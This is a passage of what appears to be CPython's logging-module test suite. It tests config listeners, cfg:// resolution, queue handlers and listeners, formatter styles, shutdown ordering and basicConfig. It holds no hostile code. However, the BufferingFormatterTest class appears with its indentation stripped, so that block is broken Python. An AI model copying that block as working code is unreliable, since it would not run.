            # Transforms the payload (reverses it) before it is applied.
            return stuff[::-1]
        logger = logging.getLogger("compiler.parser")
        to_send = textwrap.dedent(ConfigFileTest.config1)
        # First, specify a verification function that will fail.
        # We expect to see no output, since our configuration
        # never took effect.
        with support.captured_stdout() as output:
            self.setup_via_listener(to_send, verify_fail)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
        self.assert_log_lines([], stream=output)
        # Original logger output has the stuff we logged.
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], pat=r"^[\w.]+ -> (\w+): (\d+)$")
        # Now, perform no verification. Our configuration
        # should take effect.
        with support.captured_stdout() as output:
            self.setup_via_listener(to_send)    # no verify callable specified
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '3'),
            ('ERROR', '4'),
        ], stream=output)
        # Original logger output still has the stuff we logged before.
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], pat=r"^[\w.]+ -> (\w+): (\d+)$")
        # Now, perform verification which transforms the bytes.
        with support.captured_stdout() as output:
            self.setup_via_listener(to_send[::-1], verify_reverse)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
        self.assert_log_lines([
            ('INFO', '5'),
            ('ERROR', '6'),
        ], stream=output)
        # Original logger output still has the stuff we logged before.
        self.assert_log_lines([
            ('INFO', '1'),
            ('ERROR', '2'),
        ], pat=r"^[\w.]+ -> (\w+): (\d+)$")
    def test_out_of_order(self):
        # The MemoryHandler's 'target' (defined later in the dict) must have
        # been resolved to a real Handler object.
        self.apply_config(self.out_of_order)
        handler = logging.getLogger('mymodule').handlers[0]
        self.assertIsInstance(handler.target, logging.Handler)
        self.assertIsInstance(handler.formatter._style,
                              logging.StringTemplateStyle)
    def test_baseconfig(self):
        # Exercise cfg:// resolution in BaseConfigurator.convert().
        d = {
            'atuple': (1, 2, 3),
            'alist': ['a', 'b', 'c'],
            'adict': {'d': 'e', 'f': 3 },
            'nest1': ('g', ('h', 'i'), 'j'),
            'nest2': ['k', ['l', 'm'], 'n'],
            'nest3': ['o', 'cfg://alist', 'p'],
        }
        bc = logging.config.BaseConfigurator(d)
        self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
        self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
        self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
        self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
        self.assertEqual(bc.convert('cfg://adict.d'), 'e')
        self.assertEqual(bc.convert('cfg://adict[f]'), 3)
        v = bc.convert('cfg://nest3')
        self.assertEqual(v.pop(1), ['a', 'b', 'c'])
        self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
        self.assertRaises(ValueError, bc.convert, 'cfg://!')
        self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
    """Tests for logging.Manager plumbing (logger class / record factory)."""
    def test_manager_loggerclass(self):
        # Loggers created through a Manager use the class installed via
        # setLoggerClass; the global root manager is unaffected.
        captured = []
        class RecordingLogger(logging.Logger):
            def _log(self, level, msg, args, exc_info=None, extra=None):
                captured.append(msg)
        manager = logging.Manager(None)
        # A class that is not a Logger subclass must be rejected.
        self.assertRaises(TypeError, manager.setLoggerClass, int)
        manager.setLoggerClass(RecordingLogger)
        manager.getLogger('test').warning('should appear in logged')
        logging.warning('should not appear in logged')
        self.assertEqual(captured, ['should appear in logged'])
    def test_set_log_record_factory(self):
        # setLogRecordFactory simply stores the supplied factory object.
        manager = logging.Manager(None)
        factory = object()
        manager.setLogRecordFactory(factory)
        self.assertEqual(manager.logRecordFactory, factory)
class ChildLoggerTest(BaseTest):
    """Tests for Logger.getChild name composition."""
    def test_child_loggers(self):
        root = logging.getLogger()
        abc = logging.getLogger('abc')
        logging.getLogger('def.ghi')  # pre-create an unrelated dotted logger
        # Children of the root logger are plain top-level loggers.
        self.assertIs(root.getChild('xyz'), logging.getLogger('xyz'))
        self.assertIs(root.getChild('uvw.xyz'), logging.getLogger('uvw.xyz'))
        # getChild composes dotted names, in one step or several.
        child = abc.getChild('def')
        grandchild = child.getChild('ghi')
        self.assertIs(child, logging.getLogger('abc.def'))
        self.assertIs(grandchild, logging.getLogger('abc.def.ghi'))
        self.assertIs(grandchild, abc.getChild('def.ghi'))
class DerivedLogRecord(logging.LogRecord):
    """LogRecord subclass used to exercise logging.setLogRecordFactory()."""
class LogRecordFactoryTest(BaseTest):
    """Test that logging.setLogRecordFactory() controls the record type."""
    def setUp(self):
        # The filter raises if a record of an unexpected type passes through,
        # turning "wrong factory in effect" into a visible failure.
        class CheckingFilter(logging.Filter):
            def __init__(self, cls):
                self.cls = cls
            def filter(self, record):
                t = type(record)
                if t is not self.cls:
                    msg = 'Unexpected LogRecord type %s, expected %s' % (t,
                            self.cls)
                    raise TypeError(msg)
                return True
        BaseTest.setUp(self)
        self.filter = CheckingFilter(DerivedLogRecord)
        self.root_logger.addFilter(self.filter)
        # Save the global factory so tearDown() can restore it.
        self.orig_factory = logging.getLogRecordFactory()
    def tearDown(self):
        self.root_logger.removeFilter(self.filter)
        BaseTest.tearDown(self)
        logging.setLogRecordFactory(self.orig_factory)
    def test_logrecord_class(self):
        # With the default factory in place the filter raises TypeError;
        # after installing DerivedLogRecord the record passes through.
        self.assertRaises(TypeError, self.root_logger.warning,
                          self.next_message())
        logging.setLogRecordFactory(DerivedLogRecord)
        self.root_logger.error(self.next_message())
        self.assert_log_lines([
           ('root', 'ERROR', '2'),
        ])
class QueueHandlerTest(BaseTest):
    """Tests for logging.handlers.QueueHandler and QueueListener."""
    # Logged lines are '<name> -> <level>: <counter>'.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
    def setUp(self):
        BaseTest.setUp(self)
        self.queue = queue.Queue(-1)
        self.que_hdlr = logging.handlers.QueueHandler(self.queue)
        self.name = 'que'
        self.que_logger = logging.getLogger('que')
        # Isolate the 'que' logger: no propagation, WARNING threshold.
        self.que_logger.propagate = False
        self.que_logger.setLevel(logging.WARNING)
        self.que_logger.addHandler(self.que_hdlr)
    def tearDown(self):
        self.que_hdlr.close()
        BaseTest.tearDown(self)
    def test_queue_handler(self):
        # Below-threshold records must not reach the queue.
        self.que_logger.debug(self.next_message())
        self.assertRaises(queue.Empty, self.queue.get_nowait)
        self.que_logger.info(self.next_message())
        self.assertRaises(queue.Empty, self.queue.get_nowait)
        # A WARNING record is enqueued as a LogRecord with args merged away.
        msg = self.next_message()
        self.que_logger.warning(msg)
        data = self.queue.get_nowait()
        self.assertTrue(isinstance(data, logging.LogRecord))
        self.assertEqual(data.name, self.que_logger.name)
        self.assertEqual((data.msg, data.args), (msg, None))
    def test_formatting(self):
        # QueueHandler.prepare() pre-formats the record: both msg and
        # message carry the fully formatted text.
        msg = self.next_message()
        levelname = logging.getLevelName(logging.WARNING)
        log_format_str = '{name} -> {levelname}: {message}'
        formatted_msg = log_format_str.format(name=self.name,
                                              levelname=levelname, message=msg)
        formatter = logging.Formatter(self.log_format)
        self.que_hdlr.setFormatter(formatter)
        self.que_logger.warning(msg)
        log_record = self.queue.get_nowait()
        self.assertEqual(formatted_msg, log_record.msg)
        self.assertEqual(formatted_msg, log_record.message)
    @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
                         'logging.handlers.QueueListener required for this test')
    def test_queue_listener(self):
        handler = support.TestHandler(support.Matcher())
        listener = logging.handlers.QueueListener(self.queue, handler)
        listener.start()
        try:
            self.que_logger.warning(self.next_message())
            self.que_logger.error(self.next_message())
            self.que_logger.critical(self.next_message())
        finally:
            listener.stop()
        self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
        self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
        self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
        handler.close()
        # Now test with respect_handler_level set: the handler's own level
        # (CRITICAL) filters out lower-severity records.
        handler = support.TestHandler(support.Matcher())
        handler.setLevel(logging.CRITICAL)
        listener = logging.handlers.QueueListener(self.queue, handler,
                                                  respect_handler_level=True)
        listener.start()
        try:
            self.que_logger.warning(self.next_message())
            self.que_logger.error(self.next_message())
            self.que_logger.critical(self.next_message())
        finally:
            listener.stop()
        self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
        self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
        self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
if hasattr(logging.handlers, 'QueueListener'):
    import multiprocessing
    from unittest.mock import patch
    class QueueListenerTest(BaseTest):
        """
        Tests based on patch submitted for issue #27930. Ensure that
        QueueListener handles all log messages, from both queue.Queue and
        multiprocessing.Queue.
        """
        # How many times each scenario is repeated, to catch races.
        repeat = 20
        @staticmethod
        def setup_and_log(log_queue, ident):
            """
            Creates a logger with a QueueHandler that logs to log_queue, then
            starts a QueueListener on the same queue, logs five messages and
            shuts everything down again.
            """
            logger = logging.getLogger('test_logger_with_id_%s' % ident)
            logger.setLevel(logging.DEBUG)
            handler = logging.handlers.QueueHandler(log_queue)
            logger.addHandler(handler)
            listener = logging.handlers.QueueListener(log_queue)
            listener.start()
            logger.info('one')
            logger.info('two')
            logger.info('three')
            logger.info('four')
            logger.info('five')
            listener.stop()
            logger.removeHandler(handler)
            handler.close()
        @patch.object(logging.handlers.QueueListener, 'handle')
        def test_handle_called_with_queue_queue(self, mock_handle):
            for i in range(self.repeat):
                log_queue = queue.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
            self.assertEqual(mock_handle.call_count, 5 * self.repeat,
                             'correct number of handled log messages')
        @patch.object(logging.handlers.QueueListener, 'handle')
        def test_handle_called_with_mp_queue(self, mock_handle):
            # Issue 28668: The multiprocessing (mp) module is not functional
            # when the mp.synchronize module cannot be imported.
            support.import_module('multiprocessing.synchronize')
            for i in range(self.repeat):
                log_queue = multiprocessing.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
                log_queue.close()
                log_queue.join_thread()
            self.assertEqual(mock_handle.call_count, 5 * self.repeat,
                             'correct number of handled log messages')
        @staticmethod
        def get_all_from_queue(log_queue):
            # Drain the queue non-blockingly; yields each item.
            try:
                while True:
                    yield log_queue.get_nowait()
            except queue.Empty:
                return []
        def test_no_messages_in_queue_after_stop(self):
            """
            Five messages are logged then the QueueListener is stopped. This
            test then gets everything off the queue. Failure of this test
            indicates that messages were not registered on the queue until
            _after_ the QueueListener stopped.
            """
            # Issue 28668: The multiprocessing (mp) module is not functional
            # when the mp.synchronize module cannot be imported.
            support.import_module('multiprocessing.synchronize')
            for i in range(self.repeat):
                queue = multiprocessing.Queue()
                self.setup_and_log(queue, '%s_%s' %(self.id(), i))
                # Only the sentinel (or nothing at all) may remain.
                items = list(self.get_all_from_queue(queue))
                queue.close()
                queue.join_thread()
                expected = [[], [logging.handlers.QueueListener._sentinel]]
                self.assertIn(items, expected,
                              'Found unexpected messages in queue: %s' % (
                                    [m.msg if isinstance(m, logging.LogRecord)
                                     else m for m in items]))
# A minimal concrete tzinfo with a fixed zero offset, used by the time
# formatting tests below.
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
    """Fixed-offset tzinfo: UTC with no DST."""
    def utcoffset(self, dt):
        return ZERO
    def dst(self, dt):
        return ZERO
    def tzname(self, dt):
        return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
    """Tests for logging.Formatter styles (%, {, $) and time formatting."""
    def setUp(self):
        # Base attribute dict used to synthesise LogRecords for formatting.
        self.common = {
            'name': 'formatter.test',
            'level': logging.DEBUG,
            'pathname': os.path.join('path', 'to', 'dummy.ext'),
            'lineno': 42,
            'exc_info': None,
            'func': None,
            'msg': 'Message with %d %s',
            'args': (2, 'placeholders'),
        }
        # Named overrides of self.common, selectable in get_record().
        self.variants = {
        }
    def get_record(self, name=None):
        # Build a LogRecord from self.common, optionally updated with the
        # named variant.
        result = dict(self.common)
        if name is not None:
            result.update(self.variants[name])
        return logging.makeLogRecord(result)
    def test_percent(self):
        # %-style formatting, including usesTime() detection.
        r = self.get_record()
        f = logging.Formatter('${%(message)s}')
        self.assertEqual(f.format(r), '${Message with 2 placeholders}')
        f = logging.Formatter('%(random)s')
        self.assertRaises(KeyError, f.format, r)
        self.assertFalse(f.usesTime())
        f = logging.Formatter('%(asctime)s')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('%(asctime)-15s')
        self.assertTrue(f.usesTime())
        # Bare 'asctime' (no % placeholder) does not count as using time.
        f = logging.Formatter('asctime')
        self.assertFalse(f.usesTime())
    def test_braces(self):
        # str.format ('{') style formatting.
        r = self.get_record()
        f = logging.Formatter('$%{message}%$', style='{')
        self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
        f = logging.Formatter('{random}', style='{')
        self.assertRaises(KeyError, f.format, r)
        self.assertFalse(f.usesTime())
        f = logging.Formatter('{asctime}', style='{')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('{asctime!s:15}', style='{')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('{asctime:15}', style='{')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('asctime', style='{')
        self.assertFalse(f.usesTime())
    def test_dollars(self):
        # string.Template ('$') style formatting.
        r = self.get_record()
        f = logging.Formatter('$message', style='$')
        self.assertEqual(f.format(r), 'Message with 2 placeholders')
        f = logging.Formatter('$$%${message}%$$', style='$')
        self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
        f = logging.Formatter('${random}', style='$')
        self.assertRaises(KeyError, f.format, r)
        self.assertFalse(f.usesTime())
        f = logging.Formatter('${asctime}', style='$')
        self.assertTrue(f.usesTime())
        # '${asctime' is not a valid placeholder, so no time usage.
        f = logging.Formatter('${asctime', style='$')
        self.assertFalse(f.usesTime())
        f = logging.Formatter('$asctime', style='$')
        self.assertTrue(f.usesTime())
        f = logging.Formatter('asctime', style='$')
        self.assertFalse(f.usesTime())
    def test_invalid_style(self):
        self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
    def test_time(self):
        r = self.get_record()
        dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
        # We use None to indicate we want the local timezone time.
        r.created = time.mktime(dt.astimezone(None).timetuple())
        r.msecs = 123
        f = logging.Formatter('%(asctime)s %(message)s')
        # Use gmtime so the expected strings are timezone-independent.
        f.converter = time.gmtime
        self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
        self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
        f.format(r)
        self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
    """BufferingFormatter that brackets output with the record count."""

    def formatHeader(self, records):
        count = len(records)
        return '[(%d)' % count

    def formatFooter(self, records):
        count = len(records)
        return '(%d)]' % count
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
    """Test that logging.exception() captures traceback and stack info."""

    def test_formatting(self):
        r = self.root_logger
        h = RecordingHandler()
        r.addHandler(h)
        try:
            raise RuntimeError('deliberate mistake')
        except:
            # stack_info=True additionally records the caller's stack.
            logging.exception('failed', stack_info=True)
        r.removeHandler(h)
        h.close()
        r = h.records[0]
        # exc_text holds the formatted traceback of the active exception.
        self.assertTrue(r.exc_text.startswith('Traceback (most recent '
                                              'call last):\n'))
        self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
                                            'deliberate mistake'))
        # stack_info ends at the line that issued the logging call itself.
        self.assertTrue(r.stack_info.startswith('Stack (most recent '
                                                'call last):\n'))
        self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
                                              'stack_info=True)'))
class LastResortTest(BaseTest):
    """Test the module-level handler of last resort (logging.lastResort)."""

    def test_last_resort(self):
        # Test the last resort handler
        root = self.root_logger
        root.removeHandler(self.root_hdlr)
        old_lastresort = logging.lastResort
        old_raise_exceptions = logging.raiseExceptions

        try:
            # With no handlers, WARNING+ goes to stderr via lastResort;
            # DEBUG is below lastResort's level and is dropped silently.
            with support.captured_stderr() as stderr:
                root.debug('This should not appear')
                self.assertEqual(stderr.getvalue(), '')
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), 'Final chance!\n')

            # No handlers and no last resort, so 'No handlers' message
            logging.lastResort = None
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                msg = 'No handlers could be found for logger "root"\n'
                self.assertEqual(stderr.getvalue(), msg)

            # 'No handlers' message only printed once
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), '')

            # If raiseExceptions is False, no message is printed
            root.manager.emittedNoHandlerWarning = False
            logging.raiseExceptions = False
            with support.captured_stderr() as stderr:
                root.warning('Final chance!')
                self.assertEqual(stderr.getvalue(), '')
        finally:
            # Restore global logging state for the other tests.
            root.addHandler(self.root_hdlr)
            logging.lastResort = old_lastresort
            logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
    """Stand-in handler that records which lifecycle methods are invoked.

    Each of acquire/flush/close/release appends '<identifier> - <method>'
    to the shared *called* list when invoked, letting tests verify the
    order in which logging.shutdown() drives handlers.
    """

    _METHODS = ('acquire', 'flush', 'close', 'release')

    def __init__(self, identifier, called):
        for name in self._METHODS:
            setattr(self, name, self.record_call(identifier, name, called))

    def record_call(self, identifier, method_name, called):
        """Return a zero-arg recorder closure for *method_name*."""
        def inner():
            called.append('{} - {}'.format(identifier, method_name))
        return inner
class RecordingHandler(logging.NullHandler):
    """NullHandler variant that keeps every record passed to handle()."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Records seen so far, in arrival order.
        self.records = []

    def handle(self, record):
        # Store the record instead of discarding it like NullHandler does.
        self.records.append(record)
class ShutdownTest(BaseTest):
    """Test logging.shutdown(): handlers are processed in reverse order of
    registration, and errors raised during shutdown are tolerated according
    to logging.raiseExceptions."""

    def setUp(self):
        super(ShutdownTest, self).setUp()
        self.called = []

        raise_exceptions = logging.raiseExceptions
        self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)

    def raise_error(self, error):
        """Return a zero-arg callable raising *error* when invoked."""
        def inner():
            raise error()
        return inner

    def test_no_failure(self):
        # create some fake handlers
        handler0 = FakeHandler(0, self.called)
        handler1 = FakeHandler(1, self.called)
        handler2 = FakeHandler(2, self.called)

        # create live weakref to those handlers
        handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
        logging.shutdown(handlerList=list(handlers))

        # Handlers are shut down in reverse order: acquire/flush/close,
        # then release, for each handler in turn.
        expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
                    '1 - acquire', '1 - flush', '1 - close', '1 - release',
                    '0 - acquire', '0 - flush', '0 - close', '0 - release']
        self.assertEqual(expected, self.called)

    def _test_with_failure_in_method(self, method, error):
        """Shut down one handler whose *method* raises *error*; release()
        must still run last."""
        handler = FakeHandler(0, self.called)
        setattr(handler, method, self.raise_error(error))
        handlers = [logging.weakref.ref(handler)]
        logging.shutdown(handlerList=list(handlers))

        self.assertEqual('0 - release', self.called[-1])

    # OSError and ValueError during shutdown are always swallowed.
    def test_with_ioerror_in_acquire(self):
        self._test_with_failure_in_method('acquire', OSError)

    def test_with_ioerror_in_flush(self):
        self._test_with_failure_in_method('flush', OSError)

    def test_with_ioerror_in_close(self):
        self._test_with_failure_in_method('close', OSError)

    def test_with_valueerror_in_acquire(self):
        self._test_with_failure_in_method('acquire', ValueError)

    def test_with_valueerror_in_flush(self):
        self._test_with_failure_in_method('flush', ValueError)

    def test_with_valueerror_in_close(self):
        self._test_with_failure_in_method('close', ValueError)

    # Other exceptions are swallowed only when raiseExceptions is False...
    def test_with_other_error_in_acquire_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('acquire', IndexError)

    def test_with_other_error_in_flush_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('flush', IndexError)

    def test_with_other_error_in_close_without_raise(self):
        logging.raiseExceptions = False
        self._test_with_failure_in_method('close', IndexError)

    # ...and propagate when raiseExceptions is True.
    def test_with_other_error_in_acquire_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'acquire', IndexError)

    def test_with_other_error_in_flush_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'flush', IndexError)

    def test_with_other_error_in_close_with_raise(self):
        logging.raiseExceptions = True
        self.assertRaises(IndexError, self._test_with_failure_in_method,
                          'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
    """Test module-level conveniences: logging.disable(), the debug()/info()/
    etc. shortcuts, setLoggerClass(), and logging during interpreter
    shutdown."""

    def test_disable(self):
        old_disable = logging.root.manager.disable
        # confirm our assumptions are correct
        self.assertEqual(old_disable, 0)
        self.addCleanup(logging.disable, old_disable)

        logging.disable(83)
        self.assertEqual(logging.root.manager.disable, 83)

        # test the default value introduced in 3.7
        # (Issue #28524)
        logging.disable()
        self.assertEqual(logging.root.manager.disable, logging.CRITICAL)

    def _test_log(self, method, level=None):
        """Call logging.<method>() while the root logger has a handler and
        verify the record's level; basicConfig() must not be invoked."""
        called = []
        support.patch(self, logging, 'basicConfig',
                      lambda *a, **kw: called.append((a, kw)))

        recording = RecordingHandler()
        logging.root.addHandler(recording)

        log_method = getattr(logging, method)
        if level is not None:
            log_method(level, "test me: %r", recording)
        else:
            log_method("test me: %r", recording)

        self.assertEqual(len(recording.records), 1)
        record = recording.records[0]
        self.assertEqual(record.getMessage(), "test me: %r" % recording)

        # log() takes an explicit level; the named shortcuts imply one.
        expected_level = level if level is not None else getattr(logging, method.upper())
        self.assertEqual(record.levelno, expected_level)

        # basicConfig was not called!
        self.assertEqual(called, [])

    def test_log(self):
        self._test_log('log', logging.ERROR)

    def test_debug(self):
        self._test_log('debug')

    def test_info(self):
        self._test_log('info')

    def test_warning(self):
        self._test_log('warning')

    def test_error(self):
        self._test_log('error')

    def test_critical(self):
        self._test_log('critical')

    def test_set_logger_class(self):
        # setLoggerClass() only accepts Logger subclasses.
        self.assertRaises(TypeError, logging.setLoggerClass, object)

        class MyLogger(logging.Logger):
            pass

        logging.setLoggerClass(MyLogger)
        self.assertEqual(logging.getLoggerClass(), MyLogger)

        logging.setLoggerClass(logging.Logger)
        self.assertEqual(logging.getLoggerClass(), logging.Logger)

    @support.requires_type_collecting
    def test_logging_at_shutdown(self):
        # Issue #20037: logging from __del__ during interpreter shutdown
        # must still work (run in a subprocess to exercise real shutdown).
        code = """if 1:
            import logging
            class A:
                def __del__(self):
                    try:
                        raise ValueError("some error")
                    except Exception:
                        logging.exception("exception in __del__")
            a = A()"""
        rc, out, err = assert_python_ok("-c", code)
        err = err.decode()
        self.assertIn("exception in __del__", err)
        self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
    """Test LogRecord construction and its optional/runtime attributes."""

    def test_str_rep(self):
        r = logging.makeLogRecord({})
        s = str(r)
        self.assertTrue(s.startswith('<LogRecord: '))
        self.assertTrue(s.endswith('>'))

    def test_dict_arg(self):
        h = RecordingHandler()
        r = logging.getLogger()
        r.addHandler(h)
        d = {'less' : 'more' }
        logging.warning('less is %(less)s', d)
        # A sole dict argument is kept as-is for %(name)s interpolation.
        self.assertIs(h.records[0].args, d)
        self.assertEqual(h.records[0].message, 'less is more')
        r.removeHandler(h)
        h.close()

    def test_multiprocessing(self):
        r = logging.makeLogRecord({})
        self.assertEqual(r.processName, 'MainProcess')
        try:
            # When multiprocessing is available, the record picks up the
            # current process name instead of the default.
            import multiprocessing as mp
            r = logging.makeLogRecord({})
            self.assertEqual(r.processName, mp.current_process().name)
        except ImportError:
            pass

    def test_optional(self):
        r = logging.makeLogRecord({})
        NOT_NONE = self.assertIsNotNone
        NOT_NONE(r.thread)
        NOT_NONE(r.threadName)
        NOT_NONE(r.process)
        NOT_NONE(r.processName)
        log_threads = logging.logThreads
        log_processes = logging.logProcesses
        log_multiprocessing = logging.logMultiprocessing
        try:
            # Disabling these module flags suppresses the corresponding
            # record attributes (they become None).
            logging.logThreads = False
            logging.logProcesses = False
            logging.logMultiprocessing = False
            r = logging.makeLogRecord({})
            NONE = self.assertIsNone
            NONE(r.thread)
            NONE(r.threadName)
            NONE(r.process)
            NONE(r.processName)
        finally:
            logging.logThreads = log_threads
            logging.logProcesses = log_processes
            logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
    """Test logging.basicConfig(): defaults, each keyword argument,
    incompatible combinations, force=True, and the implicit call made by
    the module-level logging shortcuts."""

    def setUp(self):
        super(BasicConfigTest, self).setUp()
        # Snapshot global logging state so cleanup() can restore it.
        self.handlers = logging.root.handlers
        self.saved_handlers = logging._handlers.copy()
        self.saved_handler_list = logging._handlerList[:]
        self.original_logging_level = logging.root.level
        self.addCleanup(self.cleanup)
        logging.root.handlers = []

    def tearDown(self):
        for h in logging.root.handlers[:]:
            logging.root.removeHandler(h)
            h.close()
        super(BasicConfigTest, self).tearDown()

    def cleanup(self):
        """Restore the logging state snapshotted in setUp()."""
        setattr(logging.root, 'handlers', self.handlers)
        logging._handlers.clear()
        logging._handlers.update(self.saved_handlers)
        logging._handlerList[:] = self.saved_handler_list
        logging.root.level = self.original_logging_level

    def test_no_kwargs(self):
        logging.basicConfig()

        # handler defaults to a StreamHandler to sys.stderr
        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.StreamHandler)
        self.assertEqual(handler.stream, sys.stderr)

        formatter = handler.formatter
        # format defaults to logging.BASIC_FORMAT
        self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
        # datefmt defaults to None
        self.assertIsNone(formatter.datefmt)
        # style defaults to %
        self.assertIsInstance(formatter._style, logging.PercentStyle)

        # level is not explicitly set
        self.assertEqual(logging.root.level, self.original_logging_level)

    def test_strformatstyle(self):
        with support.captured_stdout() as output:
            logging.basicConfig(stream=sys.stdout, style="{")
            logging.error("Log an error")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue().strip(),
                "ERROR:root:Log an error")

    def test_stringtemplatestyle(self):
        with support.captured_stdout() as output:
            logging.basicConfig(stream=sys.stdout, style="$")
            logging.error("Log an error")
            sys.stdout.seek(0)
            self.assertEqual(output.getvalue().strip(),
                "ERROR:root:Log an error")

    def test_filename(self):

        def cleanup(h1, h2, fn):
            h1.close()
            h2.close()
            os.remove(fn)

        logging.basicConfig(filename='test.log')

        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.FileHandler)

        # Compare against a reference FileHandler in default append mode.
        expected = logging.FileHandler('test.log', 'a')
        self.assertEqual(handler.stream.mode, expected.stream.mode)
        self.assertEqual(handler.stream.name, expected.stream.name)
        self.addCleanup(cleanup, handler, expected, 'test.log')

    def test_filemode(self):

        def cleanup(h1, h2, fn):
            h1.close()
            h2.close()
            os.remove(fn)

        logging.basicConfig(filename='test.log', filemode='wb')

        handler = logging.root.handlers[0]
        expected = logging.FileHandler('test.log', 'wb')
        self.assertEqual(handler.stream.mode, expected.stream.mode)
        self.addCleanup(cleanup, handler, expected, 'test.log')

    def test_stream(self):
        stream = io.StringIO()
        self.addCleanup(stream.close)
        logging.basicConfig(stream=stream)

        self.assertEqual(len(logging.root.handlers), 1)
        handler = logging.root.handlers[0]
        self.assertIsInstance(handler, logging.StreamHandler)
        self.assertEqual(handler.stream, stream)

    def test_format(self):
        logging.basicConfig(format='foo')

        formatter = logging.root.handlers[0].formatter
        self.assertEqual(formatter._style._fmt, 'foo')

    def test_datefmt(self):
        logging.basicConfig(datefmt='bar')

        formatter = logging.root.handlers[0].formatter
        self.assertEqual(formatter.datefmt, 'bar')

    def test_style(self):
        logging.basicConfig(style='$')

        formatter = logging.root.handlers[0].formatter
        self.assertIsInstance(formatter._style, logging.StringTemplateStyle)

    def test_level(self):
        old_level = logging.root.level
        self.addCleanup(logging.root.setLevel, old_level)

        logging.basicConfig(level=57)
        self.assertEqual(logging.root.level, 57)
        # Test that second call has no effect
        logging.basicConfig(level=58)
        self.assertEqual(logging.root.level, 57)

    def test_incompatible(self):
        assertRaises = self.assertRaises
        handlers = [logging.StreamHandler()]
        stream = sys.stderr
        # filename/stream/handlers are mutually exclusive arguments.
        assertRaises(ValueError, logging.basicConfig, filename='test.log',
                     stream=stream)
        assertRaises(ValueError, logging.basicConfig, filename='test.log',
                     handlers=handlers)
        assertRaises(ValueError, logging.basicConfig, stream=stream,
                     handlers=handlers)
        # Issue 23207: test for invalid kwargs
        assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
        # Should pop both filename and filemode even if filename is None
        logging.basicConfig(filename=None, filemode='a')

    def test_handlers(self):
        handlers = [
            logging.StreamHandler(),
            logging.StreamHandler(sys.stdout),
            logging.StreamHandler(),
        ]
        f = logging.Formatter()
        handlers[2].setFormatter(f)
        logging.basicConfig(handlers=handlers)
        self.assertIs(handlers[0], logging.root.handlers[0])
        self.assertIs(handlers[1], logging.root.handlers[1])
        self.assertIs(handlers[2], logging.root.handlers[2])
        # Handlers without a formatter get a shared default one; an
        # explicitly-set formatter is kept as-is.
